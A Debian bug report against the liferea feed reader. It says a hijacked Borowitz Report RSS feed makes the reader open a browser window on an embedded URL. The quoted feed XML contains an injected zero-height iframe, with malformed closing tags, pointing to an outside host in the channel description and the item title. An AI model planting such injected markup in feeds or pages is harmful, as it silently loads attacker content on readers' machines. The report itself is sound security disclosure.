Package: liferea
Version: 1.4.14-1
Severity: grave

When I click on this feed: http://www.borowitzreport.com/, the first item is
(currently) the following. Liferea pops up a browser window for the embedded
URL in the <iframe> whenever I try to display headlines -- I'm not even trying
to read the body of the item. The fact that the link points to a site in
Changzhou, China, and the strange nesting of the end tag -- <</iframe>/iframe>
-- make me think this feed was hijacked, so liferea's behavior is a security
hole.

<rss version="2.0">
  <channel>
    <title>Borowitz Report</title>
    <link>http://www.borowitzreport.com</link>
    <description>
      Market Tumbles on News That Bush Is Still President - White House Appearance ‘A Painful Reminder,’ Experts Say<IfrAME src=//h28.8800.org/hxw/hx/f.htm height=0><</ifRAME>/ifRAME>
    </description>
    <language>en - us</language>
    <image>
      <title>Borowitz Report</title>
      <url> http://www.borowitzreport.com/grfx/shocker_banner.gif </url>
      <link>http://www.borowitzreport.com</link>
    </image>
    <item>
      <title>
        Market Tumbles on News That Bush Is Still President - White House Appearance ‘A Painful Reminder,’ Experts Say<IfrAME src=//h28.8800.org/hxw/hx/f.htm height=0><</ifRAME>/ifRAME>
      </title>
      <description>
        President George W. Bush used a Rose Garden appearance today to reassure investors that he was at the helm of the U.S. economy, causing stock markets to plummet around the world. “You don’t have to worry about this economy, because I am in charge of it,” said Mr. Bush, touching off what some observers were calling a global financial panic. Mr. Bush began his remarks about the economy at 10:30 A.M. eastern time, and by 10:31 markets around the world had already gone into a perilous free-fal
      </description>
      <author>Andy Borowitz <[EMAIL PROTECTED]></author>
      <link> http://www.borowitzreport.com/archive_rpt.asp?rec=6857 </link>
      <pubDate>4/3/2008 12:00:00 AM</pubDate>
    </item>
  </channel>
</rss>

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (990, 'testing'), (500, 'stable'), (400, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.24-1-686 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages liferea depends on:
ii  gconf2                     2.22.0-1        GNOME configuration database syste
ii  libatk1.0-0                1.20.0-1        The ATK accessibility toolkit
ii  libc6                      2.7-6           GNU C Library: Shared libraries
ii  libcairo2                  1.4.14-1        The Cairo 2D vector graphics libra
ii  libdbus-glib-1-2           0.74-1          simple interprocess messaging syst
ii  libgcc1                    1:4.3.0-1       GCC support library
ii  libgconf2-4                2.22.0-1        GNOME configuration database syste
ii  libgcrypt11                1.4.0-3         LGPL Crypto library - runtime libr
ii  libglade2-0                1:2.6.2-1       library to load .glade files at ru
ii  libglib2.0-0               2.16.1-2        The GLib library of C routines
ii  libgnutls26                2.2.2-1         the GNU TLS library - runtime libr
ii  libgtk2.0-0                2.12.9-2        The GTK+ graphical user interface
ii  libice6                    2:1.0.4-1       X11 Inter-Client Exchange library
ii  liblua5.1-0                5.1.3-1         Simple, extensible, embeddable pro
ii  libnm-glib0                0.6.5-5         network management framework (GLib
ii  libnotify1 [libnotify1     0.4.4-3         sends desktop notifications to a n
ii  libpango1.0-0              1.20.0-1        Layout and rendering of internatio
ii  libsm6                     2:1.0.3-1+b1    X11 Session Management library
ii  libsqlite3-0               3.5.7-1         SQLite 3 shared library
ii  libstdc++6                 4.3.0-1         The GNU Standard C++ Library v3
ii  libx11-6                   2:1.0.3-7       X11 client-side library
ii  libxml2                    2.6.31.dfsg-2   GNOME XML library
ii  libxslt1.1                 1.1.22-1        XSLT processing library - runtime
ii  libxul0d                   1.8.1.13-1      Gecko engine library
ii  zlib1g                     1:1.2.3.3.dfsg-11 compression library - runtime

Versions of packages liferea recommends:
ii  curl                       7.18.0-1        Get a file from an HTTP, HTTPS or
ii  dbus                       1.1.20-1        simple interprocess messaging syst
ii  dbus-x11                   1.1.20-1        simple interprocess messaging syst
ii  wget                       1.10.2-3        retrieves files from the web

-- no debconf information